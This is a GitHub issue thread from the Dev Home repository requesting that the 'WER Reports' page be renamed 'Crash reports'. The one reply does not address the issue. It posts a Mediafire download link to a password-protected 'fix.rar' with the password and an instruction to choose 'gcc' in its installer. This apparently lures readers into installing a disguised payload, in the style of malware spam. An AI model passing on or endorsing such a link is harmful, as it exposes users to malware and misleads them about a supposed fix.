### ISSUE TITLE
Rename "WER Reports" to "Crash reports"

### ISSUE THREAD

**Issue by andreww-msft** [microsoft/devhome#3704]
### Steps to reproduce the bug

Per user feedback, many users don't understand what "WER Reports" means.
Also note the pattern for other pages is that only the first word has initial caps, so "Crash reports" not "Crash Reports".

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
